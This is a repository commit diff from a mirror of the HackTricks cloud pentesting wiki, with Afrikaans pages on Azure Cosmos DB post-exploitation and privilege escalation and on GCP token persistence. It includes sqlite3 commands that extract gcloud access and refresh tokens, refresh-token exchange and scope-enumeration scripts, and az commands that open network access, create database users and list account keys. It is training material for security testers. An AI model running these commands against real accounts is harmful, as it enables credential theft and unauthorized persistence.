gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-09 03:40:59 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az

Browse Source
This commit is contained in:
Translator
2025-02-20 23:14:37 +00:00
parent 70500ac7b2
commit 3e27e2b4ba
7 changed files with 73 additions and 197 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
src/SUMMARY.md
View File

@@ -142,7 +142,7 @@
- [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md)
- [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md)
- [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md)
- [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
- [GCP - Token Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.md)
- [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md)
- [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md)
- [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md)
@@ -458,8 +458,8 @@
- [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
- [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
- [Az - Logic Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md)
- [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
- [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
- [Az - MySQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
- [Az - PostgreSQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
- [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
- [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
- [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
@@ -489,8 +489,8 @@
- [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
- [Az - Automation Accounts Persistence](pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.md)
- [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md)
- [Az - Queue SQL Persistence](pentesting-cloud/azure-security/az-persistence/az-sql-persistance.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
- [Az - Queue SQL Persistence](pentesting-cloud/azure-security/az-persistence/az-sql-persistence.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistence.md)
- [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
- [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
- [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md)

29
src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
View File

@@ -1,29 +0,0 @@
# Az - Queue Storage Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Queue
Vir meer inligting, kyk:
{{#ref}}
../az-services/az-queue.md
{{#endref}}
### Aksies: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
Hierdie toestemming laat 'n aanvaller toe om queues en hul eienskappe binne die stoorrekening te skep of te wysig. Dit kan gebruik word om ongeoorloofde queues te skep, metadata te wysig, of toegangbeheerlys (ACLs) te verander om toegang toe te laat of te beperk. Hierdie vermoë kan werksvloei ontwrig, kwaadwillige data inspuit, sensitiewe inligting eksfiltreer, of queue-instellings manipuleer om verdere aanvalle moontlik te maak.
```bash
az storage queue create --name <new-queue-name> --account-name <storage-account>
az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account>
az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
```
## Verwysings
- [https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues](https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues)
- [https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api](https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api)
- [https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes](https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes)
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/azure-security/az-persistence/az-sql-persistance.md
View File

@@ -1,20 +0,0 @@
# Az - SQL Persistensie
{{#include ../../../banners/hacktricks-training.md}}
## SQL
Vir meer inligting, kyk:
{{#ref}}
../az-services/az-sql.md
{{#endref}}
### Algemene Persistensie Tegnieke
- Kompromitteer SQL geloofsbriewe of skep 'n SQL gebruiker (aktiveer SQL outentikasie indien nodig)
- Ken 'n gekompromitteerde gebruiker as Entrad ID administrateur toe (aktiveer Entra ID outentikasie indien nodig)
- Backdoor in die VM (as SQL VM gebruik word)
- Skep 'n FW reël om toegang tot die SQL databasis te behou
{{#include ../../../banners/hacktricks-training.md}}

67
src/pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md
View File

@@ -11,13 +11,26 @@ Vir meer inligting oor SQL Database, kyk:
### `Microsoft.DocumentDB/databaseAccounts/read` && `Microsoft.DocumentDB/databaseAccounts/write`
Met hierdie toestemming kan jy Azure Cosmos DB-rekeninge skep of opdateer. Dit sluit die aanpassing van rekeningvlakinstellings in, die toevoeging of verwydering van streke, die verandering van konsekwentievlakke, en die inskakeling of deaktivering van funksies soos multi-streek skrywe.
Met hierdie toestemming kan jy Azure Cosmos DB-rekeninge skep of opdateer. Dit sluit die aanpassing van rekeningvlak konfigurasies in, die inskakeling of deaktivering van outomatiese failover, die bestuur van netwerktoegangbeheer, die instelling van rugsteunbeleide, en die aanpassing van konsekwentievlakke. Aanvallers met hierdie toestemming kan instellings verander om sekuriteitsbeheer te verswak, beskikbaarheid te ontwrig, of data te eksfiltreer deur netwerkreëls te verander.
```bash
az cosmosdb update \
--name <account_name> \
--resource-group <resource_group_name> \
--public-network-access ENABLED
```
```bash
az cosmosdb update \
--account-name <account_name> \
--resource-group <resource_group_name> \
--capabilities EnableMongoRoleBasedAccessControl
```
Boonop kan jy bestuurde identiteite in die rekening inskakel:
```bash
az cosmosdb identity assign \
--name <cosmosdb_account_name> \
--resource-group <resource_group_name>
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/read` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/write`
Met hierdie toestemming kan jy houers (versamelings) binne 'n SQL-databasis van 'n Azure Cosmos DB-rekening skep of wysig. Houers word gebruik om data te stoor, en veranderinge aan hulle kan die databasis se struktuur en toegangspatrone beïnvloed.
```bash
@@ -79,7 +92,7 @@ az cosmosdb sql trigger create \
--operation All
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/storedProcedures/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/storedProcedures/read`
Met hierdie toestemming kan jy gestoor prosedures binne 'n houer van 'n SQL-databasis in 'n Azure Cosmos DB-rekening skep of wysig. Gestoor prosedures in Cosmos DB is bediener-kant JavaScript-funksies wat jou toelaat om logika vir die verwerking van data of die uitvoering van operasies direk binne die databasis te enkapsuleer.
Met hierdie toestemming kan jy gestoor prosedures binne 'n houer van 'n SQL-databasis in 'n Azure Cosmos DB-rekening skep of wysig. Gestoor prosedures in Cosmos DB is bediener-kant JavaScript funksies wat jou toelaat om logika vir die verwerking van data of die uitvoering van operasies direk binne die databasis te enkapsuleer.
```bash
az cosmosdb sql stored-procedure create \
--account-name <account_name> \
@@ -90,7 +103,7 @@ az cosmosdb sql stored-procedure create \
--body 'function sample() { return "Hello, Cosmos!"; }'
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/read`
Met hierdie toestemming kan jy triggers binne 'n houer van 'n SQL-databasis in 'n Azure Cosmos DB-rekening skep of wysig. Triggers stel jou in staat om bediener-kant logika uit te voer in reaksie op operasies soos invoegings, opdaterings of verwyderings.
Met hierdie toestemming kan jy triggers binne 'n houer van 'n SQL-databasis in 'n Azure Cosmos DB-rekening skep of wysig. Triggers stel jou in staat om bediener-kant logika uit te voer in reaksie op operasies soos inskrywings, opdaterings of verwyderings.
```bash
az cosmosdb sql trigger create \
--account-name <account_name> \
@@ -119,52 +132,4 @@ az cosmosdb mongodb database create \
--resource-group <resource_group_name> \
--name <database_name>
```
### `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read`
Met hierdie toestemming kan jy nuwe MongoDB roldefinisies binne 'n Azure Cosmos DB rekening skep. Dit stel jou in staat om pasgemaakte rolle met spesifieke toestemmings vir MongoDB gebruikers te definieer.
```bash
az cosmosdb mongodb role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.readWriteRole",
"RoleName": "readWriteRole",
"Type": "CustomRole",
"DatabaseName": "<mydatabase>",
"Privileges": [
{
"Resource": {
"Db": "<mydatabase>",
"Collection": "mycollection"
},
"Actions": [
"insert",
"find",
"update"
]
}
],
"Roles": []
}'
```
### `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read`
Met hierdie toestemming kan jy nuwe MongoDB gebruikersdefinisies binne 'n Azure Cosmos DB rekening skep. Dit stel die voorsiening van gebruikers met spesifieke rolle en toegangsvlakke tot MongoDB databasisse in staat.
```bash
az cosmosdb mongodb user definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.myUser",
"UserName": "myUser",
"Password": "mySecurePassword",
"DatabaseName": "<mydatabase>",
"CustomData": "TestCustomData",
"Mechanisms": "SCRAM-SHA-256",
"Roles": [
{
"Role": "readWriteRole",
"Db": "<mydatabase>"
}
]
}'
```
{{#include ../../../banners/hacktricks-training.md}}

53
src/pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md
View File

@@ -43,12 +43,63 @@ az cosmosdb sql role assignment create \
--principal-id <principal_id-togive-perms> \
--scope "/"
```
### (`Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read`)&& (`Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read`)
Met hierdie toestemming kan jy nuwe MongoDB roldefinisies binne 'n Azure Cosmos DB-rekening skep. Dit stel jou in staat om pasgemaakte rolle met spesifieke toestemmings vir MongoDB gebruikers te definieer. RBAC-funksies moet geaktiveer wees om dit te gebruik.
```bash
az cosmosdb mongodb role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.readWriteRole",
"RoleName": "readWriteRole",
"Type": "CustomRole",
"DatabaseName": "<mydatabase>",
"Privileges": [
{
"Resource": {
"Db": "<mydatabase>",
"Collection": "mycollection"
},
"Actions": [
"insert",
"find",
"update"
]
}
],
"Roles": []
}'
```
U kan nuwe MongoDB gebruikersdefinisies binne 'n Azure Cosmos DB-rekening skep. Dit stel die voorsiening van gebruikers met spesifieke rolle en toegang tot MongoDB-databasisse in staat.
```bash
az cosmosdb mongodb user definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.myUser",
"UserName": "<myUser>",
"Password": "<mySecurePassword>",
"DatabaseName": "<mydatabase>",
"CustomData": "TestCustomData",
"Mechanisms": "SCRAM-SHA-256",
"Roles": [
{
"Role": "readWriteRole",
"Db": "<mydatabase>"
}
]
}'
```
Nadat 'n nuwe gebruiker binne die MongoDB geskep is, kan ons dit toegang:
```bash
mongosh "mongodb://<myUser>:<mySecurePassword>@<account_name>.mongo.cosmos.azure.com:10255/<mymongodatabase>?ssl=true&replicaSet=globaldb&retrywrites=false"
```
### `Microsoft.DocumentDB/databaseAccounts/listKeys/action`
Met hierdie toestemming kan jy die primêre en sekondêre sleutels vir 'n Azure Cosmos DB-rekening verkry. Hierdie sleutels bied volle toegang tot die databasisrekening en sy hulpbronne, wat aksies soos data lees, skryf en konfigurasiewijzigings moontlik maak.
```bash
az cosmosdb keys list \
--name <account_name> \
--resource-group <resource_group_name>
```
{{#include ../../../banners/hacktricks-training.md}}

90
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
View File

@@ -1,90 +0,0 @@
# GCP - Token Volharding
{{#include ../../../banners/hacktricks-training.md}}
### Geverifieerde Gebruikerstokens
Om die **huidige token** van 'n gebruiker te verkry, kan jy die volgende uitvoer:
```bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
```
Kyk op hierdie bladsy hoe om **hierdie token direk met gcloud te gebruik**:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#gcp
{{#endref}}
Om die besonderhede te kry om **'n nuwe toegangstoken te genereer**, voer in:
```bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
```
Dit is ook moontlik om verfris tokens te vind in **`$HOME/.config/gcloud/application_default_credentials.json`** en in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
Om 'n nuwe verfriste toegangstoken met die **verfris token**, kliënt ID, en kliënt geheim te verkry, voer in:
```bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
Die geldigheid van die hernuwingstokens kan bestuur word in **Admin** > **Security** > **Google Cloud session control**, en standaard is dit op 16h gestel, hoewel dit op nooit verval kan word nie:
<figure><img src="../../../images/image (11).png" alt=""><figcaption></figcaption></figure>
### Auth flow
Die outentikasie-stroom wanneer iets soos `gcloud auth login` gebruik word, sal 'n prompt in die blaaier oopmaak en na die aanvaarding van al die skope sal die blaaiers 'n versoek soos hierdie na die http-poort wat deur die hulpmiddel oopgemaak is, stuur:
```
/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1
```
Dan sal gcloud die toestand en kode gebruik met 'n paar hardgecodeerde `client_id` (`32555940559.apps.googleusercontent.com`) en **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) om die **finale hernuwingstoken data** te verkry.
> [!CAUTION]
> Let daarop dat die kommunikasie met localhost in HTTP is, so dit is moontlik om die data te onderskep om 'n hernuwingstoken te verkry, maar hierdie data is net 1 keer geldig, so dit sou nutteloos wees, dit is makliker om net die hernuwingstoken uit die lêer te lees.
### OAuth Scopes
Jy kan al die Google scopes vind in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) of hulle verkry deur die volgende uit te voer:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
```
Dit is moontlik om te sien watter skope die toepassing wat **`gcloud`** gebruik om te autentiseer, kan ondersteun met hierdie skrif:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done
```
Na uitvoering daarvan is dit nagegaan dat hierdie toepassing hierdie skope ondersteun:
```
https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email
```
dit is interessant om te sien hoe hierdie app die **`drive`** omvang ondersteun, wat 'n gebruiker in staat kan stel om van GCP na Workspace op te skaal as 'n aanvaller daarin slaag om die gebruiker te dwing om 'n token met hierdie omvang te genereer.
**Kyk hoe om** [**dit hier te misbruik**](../gcp-to-workspace-pivoting/index.html#abusing-gcloud)**.**
### Diensrekeninge
Net soos met geverifieerde gebruikers, as jy daarin slaag om die **privaat sleutel lêer** van 'n diensrekening te **kompromitteer, sal jy dit gewoonlik kan **toegang hê solank jy wil**.\
As jy egter die **OAuth-token** van 'n diensrekening steel, kan dit selfs meer interessant wees, want, selfs al is hierdie tokens standaard net nuttig vir 'n uur, as die **slagoffer die privaat API-sleutel verwyder, sal die OAuth-token steeds geldig wees totdat dit verval**.
### Metadata
Dit is duidelik dat, solank jy binne 'n masjien wat in die GCP-omgewing loop, sal jy in staat wees om die **diensrekening wat aan daardie masjien gekoppel is, te toegang deur die metadata-eindpunt te kontak** (let daarop dat die Oauth-tokens wat jy in hierdie eindpunt kan toegang, gewoonlik deur omvang beperk is).
### Herstelmaatreëls
Sommige herstelmaatreëls vir hierdie tegnieke word verduidelik in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
### Verwysings
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
{{#include ../../../banners/hacktricks-training.md}}